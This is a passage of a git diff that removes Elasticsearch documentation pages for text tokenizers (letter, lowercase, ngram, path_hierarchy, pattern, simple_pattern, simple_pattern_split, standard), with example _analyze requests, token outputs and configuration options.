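      "tokenizer": {
        "my_keyword_tokenizer": {
          "type": "keyword",
          "buffer_size": 256 <1>
        }
      }
    }
  }
}
--------------------------------------------------
<1> Illustrative only; `256` is already the default and rarely needs changing.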
- diff --git a/docs/reference/analysis/tokenizers/letter-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/letter-tokenizer.asciidoc deleted file mode 100644 index c5b809fac1c..00000000000 --- a/docs/reference/analysis/tokenizers/letter-tokenizer.asciidoc +++ /dev/null @@ -1,124 +0,0 @@ -[[analysis-letter-tokenizer]] -=== Letter tokenizer -++++ -Letter -++++ - -The `letter` tokenizer breaks text into terms whenever it encounters a -character which is not a letter. It does a reasonable job for most European -languages, but does a terrible job for some Asian languages, where words are -not separated by spaces. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "letter", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, QUICK, Brown, Foxes, jumped, over, the, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `letter` tokenizer is not configurable. diff --git a/docs/reference/analysis/tokenizers/lowercase-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/lowercase-tokenizer.asciidoc deleted file mode 100644 index ffe44292c52..00000000000 --- a/docs/reference/analysis/tokenizers/lowercase-tokenizer.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[[analysis-lowercase-tokenizer]] -=== Lowercase tokenizer -++++ -Lowercase -++++ - -The `lowercase` tokenizer, like the -<> breaks text into terms -whenever it encounters a character which is not a letter, but it also -lowercases all terms. It is functionally equivalent to the -<> combined with the -<>, but is more -efficient as it performs both steps in a single pass. - - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "lowercase", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ the, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `lowercase` tokenizer is not configurable. diff --git a/docs/reference/analysis/tokenizers/ngram-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/ngram-tokenizer.asciidoc deleted file mode 100644 index cd7f2fb7c74..00000000000 --- a/docs/reference/analysis/tokenizers/ngram-tokenizer.asciidoc +++ /dev/null @@ -1,312 +0,0 @@ -[[analysis-ngram-tokenizer]] -=== N-gram tokenizer -++++ -N-gram -++++ - -The `ngram` tokenizer first breaks text down into words whenever it encounters -one of a list of specified characters, then it emits -{wikipedia}/N-gram[N-grams] of each word of the specified -length. - -N-grams are like a sliding window that moves across the word - a continuous -sequence of characters of the specified length. They are useful for querying -languages that don't use spaces or that have long compound words, like German. 
- -[discrete] -=== Example output - -With the default settings, the `ngram` tokenizer treats the initial text as a -single token and produces N-grams with minimum length `1` and maximum length -`2`: - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "ngram", - "text": "Quick Fox" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Q", - "start_offset": 0, - "end_offset": 1, - "type": "word", - "position": 0 - }, - { - "token": "Qu", - "start_offset": 0, - "end_offset": 2, - "type": "word", - "position": 1 - }, - { - "token": "u", - "start_offset": 1, - "end_offset": 2, - "type": "word", - "position": 2 - }, - { - "token": "ui", - "start_offset": 1, - "end_offset": 3, - "type": "word", - "position": 3 - }, - { - "token": "i", - "start_offset": 2, - "end_offset": 3, - "type": "word", - "position": 4 - }, - { - "token": "ic", - "start_offset": 2, - "end_offset": 4, - "type": "word", - "position": 5 - }, - { - "token": "c", - "start_offset": 3, - "end_offset": 4, - "type": "word", - "position": 6 - }, - { - "token": "ck", - "start_offset": 3, - "end_offset": 5, - "type": "word", - "position": 7 - }, - { - "token": "k", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 8 - }, - { - "token": "k ", - "start_offset": 4, - "end_offset": 6, - "type": "word", - "position": 9 - }, - { - "token": " ", - "start_offset": 5, - "end_offset": 6, - "type": "word", - "position": 10 - }, - { - "token": " F", - "start_offset": 5, - "end_offset": 7, - "type": "word", - "position": 11 - }, - { - "token": "F", - "start_offset": 6, - "end_offset": 7, - "type": "word", - "position": 12 - }, - { - "token": "Fo", - "start_offset": 6, - "end_offset": 8, - "type": "word", - "position": 13 - }, - { - "token": "o", - "start_offset": 7, - "end_offset": 8, - "type": "word", - "position": 14 - }, - { - "token": "ox", - "start_offset": 7, - "end_offset": 9, - "type": "word", - "position": 15 - }, - { - "token": "x", - "start_offset": 8, - "end_offset": 9, - "type": "word", - "position": 16 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ Q, Qu, u, ui, i, ic, c, ck, k, "k ", " ", " F", F, Fo, o, ox, x ] ---------------------------- - -[discrete] -=== Configuration - -The `ngram` tokenizer accepts the following parameters: - -[horizontal] -`min_gram`:: - Minimum length of characters in a gram. Defaults to `1`. - -`max_gram`:: - Maximum length of characters in a gram. Defaults to `2`. - -`token_chars`:: - - Character classes that should be included in a token. Elasticsearch - will split on characters that don't belong to the classes specified. - Defaults to `[]` (keep all characters). -+ -Character classes may be any of the following: -+ -* `letter` -- for example `a`, `b`, `ï` or `京` -* `digit` -- for example `3` or `7` -* `whitespace` -- for example `" "` or `"\n"` -* `punctuation` -- for example `!` or `"` -* `symbol` -- for example `$` or `√` -* `custom` -- custom characters which need to be set using the -`custom_token_chars` setting. - -`custom_token_chars`:: - - Custom characters that should be treated as part of a token. For example, - setting this to `+-_` will make the tokenizer treat the plus, minus and - underscore sign as part of a token. - -TIP: It usually makes sense to set `min_gram` and `max_gram` to the same -value. 
The smaller the length, the more documents will match but the lower -the quality of the matches. The longer the length, the more specific the -matches. A tri-gram (length `3`) is a good place to start. - -The index level setting `index.max_ngram_diff` controls the maximum allowed -difference between `max_gram` and `min_gram`. - -[discrete] -=== Example configuration - -In this example, we configure the `ngram` tokenizer to treat letters and -digits as tokens, and to produce tri-grams (grams of length `3`): - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "ngram", - "min_gram": 3, - "max_gram": 3, - "token_chars": [ - "letter", - "digit" - ] - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "2 Quick Foxes." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Qui", - "start_offset": 2, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "uic", - "start_offset": 3, - "end_offset": 6, - "type": "word", - "position": 1 - }, - { - "token": "ick", - "start_offset": 4, - "end_offset": 7, - "type": "word", - "position": 2 - }, - { - "token": "Fox", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 3 - }, - { - "token": "oxe", - "start_offset": 9, - "end_offset": 12, - "type": "word", - "position": 4 - }, - { - "token": "xes", - "start_offset": 10, - "end_offset": 13, - "type": "word", - "position": 5 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ Qui, uic, ick, Fox, oxe, xes ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/pathhierarchy-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/pathhierarchy-tokenizer.asciidoc deleted file mode 100644 index 321d33d6f7c..00000000000 --- a/docs/reference/analysis/tokenizers/pathhierarchy-tokenizer.asciidoc +++ /dev/null @@ -1,360 +0,0 @@ -[[analysis-pathhierarchy-tokenizer]] -=== Path hierarchy tokenizer -++++ -Path hierarchy -++++ - -The `path_hierarchy` tokenizer takes a hierarchical value like a filesystem -path, splits on the path separator, and emits a term for each component in the -tree. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "path_hierarchy", - "text": "/one/two/three" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "/one", - "start_offset": 0, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "/one/two", - "start_offset": 0, - "end_offset": 8, - "type": "word", - "position": 0 - }, - { - "token": "/one/two/three", - "start_offset": 0, - "end_offset": 14, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - - -The above text would produce the following terms: - -[source,text] ---------------------------- -[ /one, /one/two, /one/two/three ] ---------------------------- - -[discrete] -=== Configuration - -The `path_hierarchy` tokenizer accepts the following parameters: - -[horizontal] -`delimiter`:: - The character to use as the path separator. Defaults to `/`. 
- -`replacement`:: - An optional replacement character to use for the delimiter. - Defaults to the `delimiter`. - -`buffer_size`:: - The number of characters read into the term buffer in a single pass. - Defaults to `1024`. The term buffer will grow by this size until all the - text has been consumed. It is advisable not to change this setting. - -`reverse`:: - If set to `true`, emits the tokens in reverse order. Defaults to `false`. - -`skip`:: - The number of initial tokens to skip. Defaults to `0`. - -[discrete] -=== Example configuration - -In this example, we configure the `path_hierarchy` tokenizer to split on `-` -characters, and to replace them with `/`. The first two tokens are skipped: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "path_hierarchy", - "delimiter": "-", - "replacement": "/", - "skip": 2 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "one-two-three-four-five" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "/three", - "start_offset": 7, - "end_offset": 13, - "type": "word", - "position": 0 - }, - { - "token": "/three/four", - "start_offset": 7, - "end_offset": 18, - "type": "word", - "position": 0 - }, - { - "token": "/three/four/five", - "start_offset": 7, - "end_offset": 23, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ /three, /three/four, /three/four/five ] ---------------------------- - -If we were to set `reverse` to `true`, it would produce the following: - -[source,text] ---------------------------- -[ one/two/three/, two/three/, three/ ] ---------------------------- - -[discrete] -[[analysis-pathhierarchy-tokenizer-detailed-examples]] -=== Detailed examples - -A common use-case for the `path_hierarchy` tokenizer is filtering results by -file paths. If indexing a file path along with the data, the use of the -`path_hierarchy` tokenizer to analyze the path allows filtering the results -by different parts of the file path string. - - -This example configures an index to have two custom analyzers and applies -those analyzers to multifields of the `file_path` text field that will -store filenames. One of the two analyzers uses reverse tokenization. -Some sample documents are then indexed to represent some file paths -for photos inside photo folders of two different users. 
- - -[source,console] --------------------------------------------------- -PUT file-path-test -{ - "settings": { - "analysis": { - "analyzer": { - "custom_path_tree": { - "tokenizer": "custom_hierarchy" - }, - "custom_path_tree_reversed": { - "tokenizer": "custom_hierarchy_reversed" - } - }, - "tokenizer": { - "custom_hierarchy": { - "type": "path_hierarchy", - "delimiter": "/" - }, - "custom_hierarchy_reversed": { - "type": "path_hierarchy", - "delimiter": "/", - "reverse": "true" - } - } - } - }, - "mappings": { - "properties": { - "file_path": { - "type": "text", - "fields": { - "tree": { - "type": "text", - "analyzer": "custom_path_tree" - }, - "tree_reversed": { - "type": "text", - "analyzer": "custom_path_tree_reversed" - } - } - } - } - } -} - -POST file-path-test/_doc/1 -{ - "file_path": "/User/alice/photos/2017/05/16/my_photo1.jpg" -} - -POST file-path-test/_doc/2 -{ - "file_path": "/User/alice/photos/2017/05/16/my_photo2.jpg" -} - -POST file-path-test/_doc/3 -{ - "file_path": "/User/alice/photos/2017/05/16/my_photo3.jpg" -} - -POST file-path-test/_doc/4 -{ - "file_path": "/User/alice/photos/2017/05/15/my_photo1.jpg" -} - -POST file-path-test/_doc/5 -{ - "file_path": "/User/bob/photos/2017/05/16/my_photo1.jpg" -} --------------------------------------------------- - - -A search for a particular file path string against the text field matches all -the example documents, with Bob's documents ranking highest due to `bob` also -being one of the terms created by the standard analyzer boosting relevance for -Bob's documents. - -[source,console] --------------------------------------------------- -GET file-path-test/_search -{ - "query": { - "match": { - "file_path": "/User/bob/photos/2017/05" - } - } -} --------------------------------------------------- -// TEST[continued] - -It's simple to match or filter documents with file paths that exist within a -particular directory using the `file_path.tree` field. - -[source,console] --------------------------------------------------- -GET file-path-test/_search -{ - "query": { - "term": { - "file_path.tree": "/User/alice/photos/2017/05/16" - } - } -} --------------------------------------------------- -// TEST[continued] - -With the reverse parameter for this tokenizer, it's also possible to match -from the other end of the file path, such as individual file names or a deep -level subdirectory. The following example shows a search for all files named -`my_photo1.jpg` within any directory via the `file_path.tree_reversed` field -configured to use the reverse parameter in the mapping. - - -[source,console] --------------------------------------------------- -GET file-path-test/_search -{ - "query": { - "term": { - "file_path.tree_reversed": { - "value": "my_photo1.jpg" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Viewing the tokens generated with both forward and reverse is instructive -in showing the tokens created for the same file path value. 
- - -[source,console] --------------------------------------------------- -POST file-path-test/_analyze -{ - "analyzer": "custom_path_tree", - "text": "/User/alice/photos/2017/05/16/my_photo1.jpg" -} - -POST file-path-test/_analyze -{ - "analyzer": "custom_path_tree_reversed", - "text": "/User/alice/photos/2017/05/16/my_photo1.jpg" -} --------------------------------------------------- -// TEST[continued] - - -It's also useful to be able to filter with file paths when combined with other -types of searches, such as this example looking for any files paths with `16` -that also must be in Alice's photo directory. - -[source,console] --------------------------------------------------- -GET file-path-test/_search -{ - "query": { - "bool" : { - "must" : { - "match" : { "file_path" : "16" } - }, - "filter": { - "term" : { "file_path.tree" : "/User/alice" } - } - } - } -} --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/analysis/tokenizers/pattern-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/pattern-tokenizer.asciidoc deleted file mode 100644 index 112ba92bf59..00000000000 --- a/docs/reference/analysis/tokenizers/pattern-tokenizer.asciidoc +++ /dev/null @@ -1,275 +0,0 @@ -[[analysis-pattern-tokenizer]] -=== Pattern tokenizer -++++ -Pattern -++++ - -The `pattern` tokenizer uses a regular expression to either split text into -terms whenever it matches a word separator, or to capture matching text as -terms. - -The default pattern is `\W+`, which splits text whenever it encounters -non-word characters. - -[WARNING] -.Beware of Pathological Regular Expressions -======================================== - -The pattern tokenizer uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java Regular Expressions]. - -A badly written regular expression could run very slowly or even throw a -StackOverflowError and cause the node it is running on to exit suddenly. - -Read more about https://www.regular-expressions.info/catastrophic.html[pathological regular expressions and how to avoid them]. - -======================================== - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "pattern", - "text": "The foo_bar_size's default is 5." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "foo_bar_size", - "start_offset": 4, - "end_offset": 16, - "type": "word", - "position": 1 - }, - { - "token": "s", - "start_offset": 17, - "end_offset": 18, - "type": "word", - "position": 2 - }, - { - "token": "default", - "start_offset": 19, - "end_offset": 26, - "type": "word", - "position": 3 - }, - { - "token": "is", - "start_offset": 27, - "end_offset": 29, - "type": "word", - "position": 4 - }, - { - "token": "5", - "start_offset": 30, - "end_offset": 31, - "type": "word", - "position": 5 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, foo_bar_size, s, default, is, 5 ] ---------------------------- - -[discrete] -=== Configuration - -The `pattern` tokenizer accepts the following parameters: - -[horizontal] -`pattern`:: - - A https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java regular expression], defaults to `\W+`. 
- -`flags`:: - - Java regular expression https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html#field.summary[flags]. - Flags should be pipe-separated, eg `"CASE_INSENSITIVE|COMMENTS"`. - -`group`:: - - Which capture group to extract as tokens. Defaults to `-1` (split). - -[discrete] -=== Example configuration - -In this example, we configure the `pattern` tokenizer to break text into -tokens when it encounters commas: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "pattern", - "pattern": "," - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "comma,separated,values" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "comma", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "separated", - "start_offset": 6, - "end_offset": 15, - "type": "word", - "position": 1 - }, - { - "token": "values", - "start_offset": 16, - "end_offset": 22, - "type": "word", - "position": 2 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ comma, separated, values ] ---------------------------- - -In the next example, we configure the `pattern` tokenizer to capture values -enclosed in double quotes (ignoring embedded escaped quotes `\"`). The regex -itself looks like this: - - "((?:\\"|[^"]|\\")*)" - -And reads as follows: - -* A literal `"` -* Start capturing: -** A literal `\"` OR any character except `"` -** Repeat until no more characters match -* A literal closing `"` - -When the pattern is specified in JSON, the `"` and `\` characters need to be -escaped, so the pattern ends up looking like: - - \"((?:\\\\\"|[^\"]|\\\\\")+)\" - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "pattern", - "pattern": "\"((?:\\\\\"|[^\"]|\\\\\")+)\"", - "group": 1 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "\"value\", \"value with embedded \\\" quote\"" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "value", - "start_offset": 1, - "end_offset": 6, - "type": "word", - "position": 0 - }, - { - "token": "value with embedded \\\" quote", - "start_offset": 10, - "end_offset": 38, - "type": "word", - "position": 1 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces the following two terms: - -[source,text] ---------------------------- -[ value, value with embedded \" quote ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/simplepattern-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/simplepattern-tokenizer.asciidoc deleted file mode 100644 index 3e3de000275..00000000000 --- a/docs/reference/analysis/tokenizers/simplepattern-tokenizer.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[analysis-simplepattern-tokenizer]] -=== Simple pattern tokenizer -++++ -Simple pattern -++++ - -The `simple_pattern` tokenizer uses a regular expression to capture matching 
-text as terms. The set of regular expression features it supports is more -limited than the <> tokenizer, but the -tokenization is generally faster. - -This tokenizer does not support splitting the input on a pattern match, unlike -the <> tokenizer. To split on pattern -matches using the same restricted regular expression subset, see the -<> tokenizer. - -This tokenizer uses {lucene-core-javadoc}/org/apache/lucene/util/automaton/RegExp.html[Lucene regular expressions]. -For an explanation of the supported features and syntax, see <>. - -The default pattern is the empty string, which produces no terms. This -tokenizer should always be configured with a non-default pattern. - -[discrete] -=== Configuration - -The `simple_pattern` tokenizer accepts the following parameters: - -[horizontal] -`pattern`:: - {lucene-core-javadoc}/org/apache/lucene/util/automaton/RegExp.html[Lucene regular expression], defaults to the empty string. - -[discrete] -=== Example configuration - -This example configures the `simple_pattern` tokenizer to produce terms that are -three-digit numbers - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "simple_pattern", - "pattern": "[0123456789]{3}" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "fd-786-335-514-x" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens" : [ - { - "token" : "786", - "start_offset" : 3, - "end_offset" : 6, - "type" : "word", - "position" : 0 - }, - { - "token" : "335", - "start_offset" : 7, - "end_offset" : 10, - "type" : "word", - "position" : 1 - }, - { - "token" : "514", - "start_offset" : 11, - "end_offset" : 14, - "type" : "word", - "position" : 2 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces these terms: - -[source,text] ---------------------------- -[ 786, 335, 514 ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/simplepatternsplit-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/simplepatternsplit-tokenizer.asciidoc deleted file mode 100644 index 0bf82fa3960..00000000000 --- a/docs/reference/analysis/tokenizers/simplepatternsplit-tokenizer.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[[analysis-simplepatternsplit-tokenizer]] -=== Simple pattern split tokenizer -++++ -Simple pattern split -++++ - -The `simple_pattern_split` tokenizer uses a regular expression to split the -input into terms at pattern matches. The set of regular expression features it -supports is more limited than the <> -tokenizer, but the tokenization is generally faster. - -This tokenizer does not produce terms from the matches themselves. To produce -terms from matches using patterns in the same restricted regular expression -subset, see the <> -tokenizer. - -This tokenizer uses {lucene-core-javadoc}/org/apache/lucene/util/automaton/RegExp.html[Lucene regular expressions]. -For an explanation of the supported features and syntax, see <>. - -The default pattern is the empty string, which produces one term containing the -full input. This tokenizer should always be configured with a non-default -pattern. 
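
For a quick comparison of the two approaches without creating an index, the
`_analyze` API also accepts an inline tokenizer definition. The sketch below is
illustrative only: it reuses the `fd-786-335-514-x` sample string from the
`simple_pattern` tokenizer example, and the patterns shown are just one
possible choice.

[source,console]
----------------------------
# Capture three-digit numbers as terms (simple_pattern).
POST _analyze
{
  "tokenizer": {
    "type": "simple_pattern",
    "pattern": "[0123456789]{3}"
  },
  "text": "fd-786-335-514-x"
}

# Split on "-" and emit the text between the matches (simple_pattern_split).
POST _analyze
{
  "tokenizer": {
    "type": "simple_pattern_split",
    "pattern": "-"
  },
  "text": "fd-786-335-514-x"
}
----------------------------

The first request should produce the matches themselves (`786`, `335`, `514`),
while the second discards the `-` matches and should produce the text between
them (`fd`, `786`, `335`, `514`, `x`).
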
- -[discrete] -=== Configuration - -The `simple_pattern_split` tokenizer accepts the following parameters: - -[horizontal] -`pattern`:: - A {lucene-core-javadoc}/org/apache/lucene/util/automaton/RegExp.html[Lucene regular expression], defaults to the empty string. - -[discrete] -=== Example configuration - -This example configures the `simple_pattern_split` tokenizer to split the input -text on underscores. - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "simple_pattern_split", - "pattern": "_" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "an_underscored_phrase" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens" : [ - { - "token" : "an", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }, - { - "token" : "underscored", - "start_offset" : 3, - "end_offset" : 14, - "type" : "word", - "position" : 1 - }, - { - "token" : "phrase", - "start_offset" : 15, - "end_offset" : 21, - "type" : "word", - "position" : 2 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces these terms: - -[source,text] ---------------------------- -[ an, underscored, phrase ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/standard-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/standard-tokenizer.asciidoc deleted file mode 100644 index 2ea16ea5f6a..00000000000 --- a/docs/reference/analysis/tokenizers/standard-tokenizer.asciidoc +++ /dev/null @@ -1,268 +0,0 @@ -[[analysis-standard-tokenizer]] -=== Standard tokenizer -++++ -Standard -++++ - -The `standard` tokenizer provides grammar based tokenization (based on the -Unicode Text Segmentation algorithm, as specified in -https://unicode.org/reports/tr29/[Unicode Standard Annex #29]) and works well -for most languages. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "standard", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "", - "position": 5 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 8 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown, Foxes, jumped, over, the, lazy, dog's, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `standard` tokenizer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - -[discrete] -=== Example configuration - -In this example, we configure the `standard` tokenizer to have a -`max_token_length` of 5 (for demonstration purposes): - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "standard", - "max_token_length": 5 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumpe", - "start_offset": 24, - "end_offset": 29, - "type": "", - "position": 5 - }, - { - "token": "d", - "start_offset": 29, - "end_offset": 30, - "type": "", - "position": 6 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 7 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 8 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 9 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 10 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 11 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown, 